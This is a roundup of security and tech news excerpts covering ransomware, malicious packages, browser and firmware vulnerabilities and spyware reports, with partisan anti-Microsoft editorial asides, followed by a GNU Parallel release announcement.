How to Test Your Browser’s Security
As your personal gateway to the internet, your web browser is the first line of defense against malicious websites. If your internet browser is not secure, viruses and spyware can infect your computer and damage your important data.
And while a good antivirus does help, it’s always better to prevent the entry of malware in the first place rather than try to fix the damage. But what exactly can you do about it? Is there any way to check your browser for any security vulnerabilities?
Checkmarx Finds Malicious Open Source PyPi Repository [Ed: If you download malware, it will do malicious things; a lot of these issues boil down to Microsoft shipping malware]
Checkmarx, a provider of a platform for testing application security, this week disclosed it has discovered a malicious instance of a PyPi repository for Python code that has been downloaded more than 70,000 times.
60% of BYOD companies face serious security risks
When employees began bringing shiny, new smartphones into the office in the late 2000s, many business and IT leaders spotted an opportunity. They recognized the productivity-boosting potential of mobile-connected workers, and – since almost everyone had their own smartphones – hoped this digital transformation would come at a big discount for the CFO.
PS4/PS5 security: hacker TheFloW gets another $10'000 bounty from PlayStation. Why we think it matters - Wololo.net
A few days ago, PlayStation’s account on HackerOne displayed a new awarded bounty, once again to hacker extraordinaire TheFloW, and once again for one of the top amounts in that bounty program: $10’000. The news is doing the rounds on hacking scene websites.
It’s the second bounty awarded to TheFloW by PlayStation in less than 2 weeks, and for an amount that points to a critical security flow in either the PS4, the PS5, or both. Two weeks ago, the hacker had been awarded $20’000 for another vulnerability disclosure.
6 Best Fixes for Microsoft Word Not Working on Mac [Ed: Proprietary software always prevents you getting a decent experience because upselling (other platform, new version etc.) is the perpetual objective]
Serious Vulnerabilities Found in AWS's Log4Shell Hot Patches
Hot patches made available by Amazon Web Services (AWS) in response to the recent Log4j vulnerabilities could be exploited for privilege escalation or to escape containers, according to Palo Alto Networks.
CyRC Vulnerability Analysis: CVE-2022-1271 in gzip, but it’s not as bad as it sounds [Ed: Microsoft Black Duck focusing on minor flaws in GNU instead of back doors in Microsoft's stuff]
CVE-2022-1271 is a new vulnerability affecting gzip, a widely used open source component for archiving, compressing, and decompressing files.
Featured and Established Publisher badges are now listed on the Chrome Web Store
If you have visited the Chrome Web Store recently, you may have noticed that many extensions show up with a featured and established publisher badge on the Store.
Judge dismisses Microsoft's challenges: ValueLicensing case to proceed in Britain
The ValueLicensing case against Microsoft is set to proceed in the UK after a judge dismissed the Windows vendor's jurisdictional challenge and strike-out application.
Microsoft had hoped to have its UK arm struck off from the claim and suggested that Ireland would be a better place for the claim to be heard, particularly if the company was successful in getting its UK offshoot removed.
Mr Justice Picken disagreed and dismissed Microsoft's challenges, meaning that the damages claim (and Microsoft's defense) will be heard in the High Court in England and Wales.
Google issues third emergency fix for Chrome this year
Google is issuing fixes for two vulnerabilities in its Chrome web browser, including one flaw that is already being exploited in the wild.
The emergency updates the company issued this week impact the almost three billion users of its Chrome browser as well as those using other Chromium-based browsers, such as Microsoft Edge, Brave and Vivaldi.
It is the third such emergency update Google has had to issue for Chrome this year.
Russian accused of running marketplace of stolen logins • The Register
"The cyber-criminal marketplace operated by Dekhtyarchuk promoted and facilitated the sale of compromised credentials, personally identifiable information (PII), and other sensitive financial information," FBI Houston Special Agent in Charge Jim Smith said in a statement. "Cyber-criminal actors behind these marketplaces go to great length to obfuscate their true identities and often utilize other sophisticated methods to further anonymize their activities."
Atlassian comes clean on what data-deleting script behind outage actually did [Ed: Clown computing does not mean reliability; it means data loss and loss of control over your systems' integrity and data]
Atlassian has published an account of what went wrong at the company to make the data of 400 customers vanish in a puff of cloudy vapor. And goodness, it makes for knuckle-chewing reading.
The restoration of customer data is still ongoing.
Atlassian CTO Sri Viswanath wrote that approximately 45 percent of those afflicted had had service restored but repeated the fortnight estimate it gave earlier this week for undoing the damage to the rest of the affected customers. As of the time of writing, the figure of customers with restored data had risen to 49 per cent.
ESET uncovers vulnerabilities in Lenovo laptops
Got a Lenovo laptop? You might need to do a swift bit of patching judging by the latest set of vulnerabilities uncovered by security researchers at ESET.
Three vulnerabilities were reported today: CVE-2021-3970, CVE-2021-3971, and CVE-2021-3972. The latter two are particularly embarrassing since they are related to UEFI firmware drivers used in the manufacturing process and can be used to disable SPI flash protections or the UEFI Secure Boot feature.
Russian-linked Shuckworm crew ramps up Ukraine attacks [Ed: Microsoft Windows TCO]
The four observed variants of the custom Pterodo malware – which also is known as Pteranodon – all use Visual Basic Script (VBS) droppers with similar functions. They drop a VBScripts file, use Scheduled Tasks (shtasks.exe) to ensure persistence, and download code from a C2 server.
Machine-learning models vulnerable to undetectable backdoors • The Register
Boffins from UC Berkeley, MIT, and the Institute for Advanced Study in the United States have devised techniques to implant undetectable backdoors in machine learning (ML) models.
Their work suggests ML models developed by third parties fundamentally cannot be trusted.
In a paper that's currently being reviewed – "Planting Undetectable Backdoors in Machine Learning Models" – Shafi Goldwasser, Michael Kim, Vinod Vaikuntanathan, and Or Zamir explain how a malicious individual creating a machine learning classifier – an algorithm that classifies data into categories (eg "spam" or "not spam") – can subvert the classifier in a way that's not evident.
Brave, DuckDuckGo to unplug Google's AMP where possible
Brave, the browser maker, and DuckDuckGo, the web search service, have both taken aim at AMP, Google's controversial web publishing framework.
Brave on Tuesday introduced a feature called De-AMP that lets those using the Brave browser avoid Google-hosted AMP pages and go straight to publisher content on standard web pages.
Funky Pigeon pauses all orders after 'security incident' • The Register
WH Smith told us: "We have also informed the relevant regulators and law enforcement authorities, and we will continue to review and update our protocols based on what we learn from this incident.
Google tracked 58 exploited zero-day security holes in 2021 • The Register
More entities are reporting in-the-wild zero-day exploitation, she wrote, adding that this is a "very rough measure." Along these same lines, more vendors are noticing exploited-in-the-wild zero-day flaws in their own products. Google, as an example, discovered seven of these in its own products last year and Microsoft discovered 10, Stone wrote.
Bad password check lets anyone log into Cisco WLAN controls • The Register
The advisory refers to the vulnerability as CVE-2022-20695 and notes that if the flaw is successfully exploited, the attacker can gain administrator privileges. Cisco has bestowed the vulnerability with a severity rating of 10.0 out of 10.0. That's as bad as it gets for those whose rating scale does not go to 11.0, otherwise known as "the call is coming from inside the house!"
US warns North Korean Lazarus gang rising against cryptocurrency outfits
"The term TraderTraitor describes a series of malicious applications written using cross-platform JavaScript code with the Node.js runtime environment using the Electron framework," the agencies warn.
Criminals adopting new methods to bypass improved defenses, says Zscaler
Current events – such as the COVID-19 pandemic and the rising popularity of cryptocurrency – continue to work as lures to convince victims to click on a malicious links. The shift to more remote work has also added to the threat level of phishing. Employees no longer have the same security at home that they may have had in the office. VPNs and collaboration applications were used as themes in phishing campaigns, Desai said.
REvil resurrected? Ransomware crew appears to be back. Keyword: Appears [Ed: Microsoft Windows TCO]
REvil, aka Sodinokibi, has been one of the most active — and lucrative — ransomware gangs in history. Its victims range from US nuclear weapons contractors to MSPs such as Kaseya to British VOIP providers.
macOS Server discontinued after years on life support
Apple is finally killing off the venerable macOS Server, directing users still clinging to Profile Manager toward Mobile Device Management solutions.
The move is arguably long overdue. Much of what made macOS Server a server was deprecated in 2018 as the company announced plans to stop the likes of DHCP and DNS in its product and directed users to handy open-source alternatives.
Apple Open Directory and Profile Manager lingered on, with the latter being used for configuration management for Apple devices in an organization. Now, however, that last stub of functionality is deemed obsolete and Apple has warned that while many bits of macOS Server will live on macOS, Profile Manager will not. So the time for dodging Mobile Device Management (MDM) is up.
So, what happened with GitHub, Heroku, and those raided private repos?
GitHub says it has identified and alerted developers who have had their private repositories accessed and downloaded via stolen authentication tokens.
In this multifaceted fiasco, Microsoft-owned GitHub insisted its security was not breached. Instead, we're told, "compromised OAuth user tokens from Heroku and Travis-CI-maintained OAuth applications were stolen and abused to download private repositories belonging to dozens of victim organizations that were using these apps."
Google bans third-party call-recording apps from Play Store
Google has made changes to its Play Store policies, effectively banning third-party call-recording apps beginning May 11, claiming it seeks to close alternative use accessibility APIs for things other than accessibility.
Google has for a while blocked real call recording on Android 6 and over the microphone on Android 10. Developers have been using accessibility APIs as a workaround to enable the recording of calls on Android.
Microsoft Exchange servers hacked to deploy Hive ransomware [Ed: Microsoft Windows TCO]
A Hive ransomware affiliate has been targeting Microsoft Exchange servers vulnerable to ProxyShell security issues to deploy various backdoors, including Cobalt Strike beacon.
HHS HC3 Warns Healthcare Sector of Hive Threats [Ed: Microsoft Windows TCO]
Federal authorities are warning the healthcare and public health sectors of aggressive, financially motivated attacks by the Hive ransomware group, which has been
Hive ransomware affiliate zeros in on Exchange servers - The Register [Ed: Microsoft Windows TCO]
An affiliate of the aggressive Hive ransomware group is exploiting known vulnerabilities in Microsoft Exchange servers to encrypt and exfiltrate data and threaten to publicly disclose the information if the ransom isn't paid.
In a recent attack on an unnamed organization, the Hive affiliate rapidly compromised multiple devices and file servers by exploiting the ProxyShell vulnerabilities in Exchange servers, encrypting the data within 72 hours of the start of the attack, threat hunters with data security vendor Varonis Systems said in a report this week.
The attack included all the hallmarks of one associated with Hive, a ransomware-as-a-service (RaaS) group that emerged in June 2021 and has targeted a range of sectors, including healthcare, retail, nonprofits, and energy providers.
UK Prime Minister, Catalan groups 'targeted by NSO Pegasus spyware'
Citizen Lab has reported finding suspected surveillance software on devices associated with both the UK Prime Minister's Office and what was formerly called the British Foreign and Commonwealth Office.
The Canadian research outfit also said it had identified at least 65 individuals linked with Catalan civil society groups in Spain who were targeted by, or infected with, surveillance software. Catalonia is an autonomous region within Spain where there's an ongoing politically divisive fight for national independence.
-
Microsoft vs The Web, Digital Restrictions (DRM) Stories
today's howtos
Barry Kauler on EasyOS and OpenEmbedded
GNU Parallel 20220422 ('Буча') released
GNU Parallel 20220422 ('Буча') has been released. It is available for download at: lbry://@GnuParallel:4 Quote of the month: Immensely useful which I am forever grateful that it exists. -- AlexDragusin@ycombinator New in this release: sash is no longer supported as shell. --retries 0 is an alias for --retries 2147483647. --shell-completion returns shell completion code. --ssh-login-file reloads every second. --parset is replaced with --_parset because it is only used internally. sem --pipe passes STDIN (standard input) to the command. Bug fixes and man page updates. Get the book: GNU Parallel 2018 http://www.lulu.com/shop/ole-tange/gnu-parallel-2018/paperback/product-23558902.html GNU Parallel - For people who live life in the parallel lane. If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.
